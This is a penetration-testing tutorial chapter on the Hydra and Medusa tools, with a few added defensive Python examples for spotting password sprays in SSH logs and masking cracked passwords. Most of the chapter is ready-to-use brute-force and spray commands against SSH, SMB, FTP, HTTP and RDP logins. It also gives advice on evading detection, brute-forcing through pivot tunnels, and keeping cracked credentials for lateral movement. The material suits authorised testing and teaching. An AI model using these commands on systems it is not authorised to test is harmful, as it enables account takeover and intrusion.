Hydra / Medusa

Hydra and Medusa are fast, flexible, and widely used password-cracking and authentication brute-forcing tools. They test credentials against online services such as SSH, FTP, RDP, MySQL, SMB, Telnet, HTTP logins, SMTP, POP3, and many more. Pentesters use these tools to identify weak passwords, validate leaked credentials, and perform targeted password-spray attacks during internal assessments. This chapter explains how both tools work, when to use them, and how to perform controlled brute-force operations without causing account lockouts.

Understanding Hydra and Medusa

Hydra and Medusa perform online authentication attacks by:

  • Trying username/password combinations

  • Testing wordlists against network services

  • Validating leaked or captured credentials

  • Identifying weak accounts

  • Assessing password policy strength

  • Supporting parallel, multi-threaded authentication attempts

Hydra is older and extremely flexible.
Medusa is newer, highly modular, and optimized for speed on large-scale attacks.

Both tools require careful use to avoid detection or account lockouts.

Preparing for Brute-Force Attacks

Before performing any login testing:

  • Identify password policy

  • Check lockout thresholds

  • Confirm allowed authentication attempts

  • Use safe timing and low thread counts

  • Test only authorized systems

Blind or aggressive brute-force attempts can cause outages during real engagements.

Hydra Basics

Hydra supports dozens of protocols and is highly customizable.

Basic Username + Password Test

hydra -l user -p password 10.10.20.5 ssh

Multiple Users

hydra -L users.txt -p password 10.10.20.5 ssh

Multiple Passwords

hydra -l user -P passwords.txt 10.10.20.5 ssh

Full Spray

hydra -L users.txt -P passwords.txt 10.10.20.5 ssh

Hydra tries combinations until a valid credential is found.

Hydra for Different Services

SSH

hydra -L users.txt -P passwords.txt ssh://10.10.20.5

FTP

hydra -L users.txt -P passwords.txt ftp://10.10.20.5

SMB

hydra -L users.txt -P passwords.txt smb://10.10.20.5

HTTP POST Login

hydra -l admin -P pass.txt 10.10.20.5 http-post-form "/login:username=^USER^&password=^PASS^:F=Invalid"

Hydra requires specifying failure conditions (F=) for web logins.

Hydra Advanced Options

Set Thread Count

hydra -t 4 -L users.txt -P pass.txt ssh://10.10.20.5

Low thread counts reduce detection risk.

Stop After First Success

hydra -f -L users.txt -P pass.txt ssh://10.10.20.5

Verbose Output

hydra -vV -L users.txt -P pass.txt ssh://10.10.20.5

Verbose mode shows each attempt.

Medusa Basics

Medusa is designed for large, fast authentication testing with strong module support.

Basic Authentication Test

medusa -h 10.10.20.5 -u user -p password -M ssh

Multiple Users

medusa -h 10.10.20.5 -U users.txt -p password -M ssh

Multiple Passwords

medusa -h 10.10.20.5 -u user -P pass.txt -M ssh

Full Credential Spray

medusa -h 10.10.20.5 -U users.txt -P pass.txt -M ssh

Medusa is extremely fast when targeting large user lists.

Medusa for Different Services

SMB

medusa -h 10.10.20.5 -U users.txt -P pass.txt -M smbnt

FTP

medusa -h 10.10.20.5 -U users.txt -P pass.txt -M ftp

HTTP Basic Auth

medusa -h 10.10.20.5 -U users.txt -P pass.txt -M http

RDP (via rdp module)

medusa -h 10.10.20.5 -U users.txt -P pass.txt -M rdp

Medusa is highly modular, and modules behave consistently across services.

Password Spraying (Safe Method)

Password spraying tests one password across many accounts to avoid lockouts.

Hydra Spray

hydra -L users.txt -p "Winter2025" 10.10.20.5 smb

Medusa Spray

medusa -h 10.10.20.5 -U users.txt -p "Winter2025" -M smbnt

Spraying one password is safer than testing many passwords per user.
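From the defender's side, spraying shows up in authentication logs as one source failing once or twice against many different accounts, which stays under per-account lockout thresholds. The following is an added example, not part of the original chapter: it classifies constructed OpenSSH failed-login lines per source IP, and the thresholds, sample hosts and function names are assumptions chosen for illustration.

```python
import re
from collections import defaultdict

# OpenSSH failure line: "Failed password for [invalid user] NAME from IP port N ssh2"
FAILED = re.compile(
    r"Failed password for (?:invalid user )?(?P<user>\S+) from (?P<ip>\S+) port \d+"
)

def _line(sec, user, ip):
    # Builds one constructed sshd log line (sample data, not a real log).
    return (f"Jan 10 02:14:{sec:02d} srv sshd[811]: Failed password for "
            f"{user} from {ip} port {50000 + sec} ssh2")

# Constructed sample: .77 tries six accounts once each, .88 hammers root,
# .12 is a single mistyped password.
SAMPLE_LOG = "\n".join(
    [_line(i, u, "10.10.20.77") for i, u in enumerate(
        ["alice", "bob", "carol", "dave", "erin", "invalid user guest"])]
    + [_line(10 + i, "root", "10.10.20.88") for i in range(8)]
    + [_line(30, "alice", "10.10.20.12")]
)

def classify_sources(log_text, min_users=5, max_per_user=2, brute_min=5):
    """Return {source_ip: 'spray' | 'brute-force' | 'noise'} for one log window.

    Thresholds are illustrative assumptions; tune them to the local baseline.
    """
    per_src = defaultdict(lambda: defaultdict(int))  # ip -> user -> failures
    for line in log_text.splitlines():
        m = FAILED.search(line)
        if m:
            per_src[m["ip"]][m["user"]] += 1
    verdicts = {}
    for ip, users in per_src.items():
        worst = max(users.values())
        if len(users) >= min_users and worst <= max_per_user:
            verdicts[ip] = "spray"        # wide and shallow: many accounts, few tries each
        elif worst >= brute_min:
            verdicts[ip] = "brute-force"  # narrow and deep: many tries on one account
        else:
            verdicts[ip] = "noise"        # e.g. a user mistyping a password
    return verdicts

if __name__ == "__main__":
    for ip, verdict in sorted(classify_sources(SAMPLE_LOG).items()):
        print(ip, verdict)
```

Feed the function one time window of logs at a time (for example the last 30 minutes) so that slow, spread-out attempts are still counted together.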

Brute-Force Against Protected Services

Some services require slower or rate-limited approaches:

SSH Slow Rate (Avoid Lockouts)

hydra -t 1 -W 5 -L users.txt -P passes.txt ssh://10.10.20.5

HTTP with CSRF, Tokens, or Captcha

(Not feasible with Hydra/Medusa; use Burp Suite instead.)

SMB Lockout Risk

Windows often locks accounts after 5–10 failed attempts.
Use spraying instead of full brute-force.

Analyzing Results

Successful attempts look like:

Hydra

[22][ssh] host: 10.10.20.5   login: user  password: pass123

Medusa

ACCOUNT FOUND: [ssh] Host:10.10.20.5 User:user Password:pass123

Log and store these credentials for:

  • lateral movement

  • privilege escalation

  • authentication relays

  • internal service mapping
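For reporting, the two success-line formats shown above can be normalised into one record per account with the cleartext password masked. This is an added example, not part of the original chapter or of either tool; the function names, the optional whitespace after the colons, and the first and last sample lines are assumptions.

```python
import re

# Success-line formats as shown in this chapter. Whitespace after the colons
# is treated as optional because spacing can differ between builds (assumption).
HYDRA = re.compile(
    r"^\[(?P<port>\d+)\]\[(?P<service>[\w-]+)\]\s+host:\s*(?P<host>\S+)"
    r"\s+login:\s*(?P<login>\S+)\s+password:\s*(?P<password>.*?)\s*$"
)
MEDUSA = re.compile(
    r"^ACCOUNT FOUND:\s+\[(?P<service>[\w-]+)\]\s+Host:\s*(?P<host>\S+)"
    r"\s+User:\s*(?P<login>\S+)\s+Password:\s*(?P<password>\S*)"
)

# Lines 2 and 3 are the chapter's examples; lines 1 and 4 are constructed.
SAMPLE_OUTPUT = """\
[DATA] attacking ssh://10.10.20.5:22/
[22][ssh] host: 10.10.20.5   login: user  password: pass123
ACCOUNT FOUND: [ssh] Host:10.10.20.5 User:user Password:pass123
ACCOUNT FOUND: [ftp] Host: 10.10.20.9 User: svc_backup Password: Winter2025 [SUCCESS]
"""

def mask(password):
    # Keep only the first character and the length, never the cleartext.
    return password[:1] + "*" * max(len(password) - 1, 0)

def parse_findings(text):
    """Return de-duplicated findings with the password masked for reporting."""
    found = {}
    for raw in text.splitlines():
        line = raw.strip()
        for tool, rx in (("hydra", HYDRA), ("medusa", MEDUSA)):
            m = rx.match(line)
            if not m:
                continue
            g = m.groupdict()
            key = (g["service"], g["host"], g["login"])  # one record per account
            rec = found.setdefault(key, {
                "service": g["service"], "host": g["host"], "login": g["login"],
                "port": int(g["port"]) if g.get("port") else None,
                "password_masked": mask(g["password"]), "tools": [],
            })
            if tool not in rec["tools"]:
                rec["tools"].append(tool)
    return list(found.values())

if __name__ == "__main__":
    for finding in parse_findings(SAMPLE_OUTPUT):
        print(finding)
```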

Using Hydra/Medusa With Proxychains

During pivoting, brute-force may run through tunnels.

Example

proxychains hydra -L u.txt -P p.txt ssh://10.10.20.50

This allows testing internal hosts reachable only through SOCKS tunnels.

Best Practices for Stealth and Safety

  • Always check lockout policies first

  • Use low threads to avoid noise

  • Use spraying instead of brute-force

  • Randomize timing using wrapper scripts

  • Run tests during off-peak hours

  • Target only authorized machines

Risky brute-force behavior can lead to detection or disruptions.

Why Hydra and Medusa Mastery Matters

Hydra and Medusa give pentesters:

  • Fast credential testing ability

  • Deep protocol support

  • Automated password audits

  • Reliable testing for weak account security

  • Scalable brute-force capabilities

  • Integration with pivoting tunnels

  • Low-level authentication insight

Weak passwords are one of the most common internal vulnerabilities.
Hydra and Medusa expose them quickly and efficiently.

Intel Dump

  • Hydra: flexible, supports many protocols

  • Medusa: very fast, modular, ideal for large-scale attacks

  • Supports SSH, SMB, FTP, HTTP, RDP, SQL, and more

  • Password spraying avoids lockouts

  • Proxychains enables internal brute-forcing

  • Tools identify weak or leaked credential pairs

  • Mastery enables efficient lateral movement and escalation
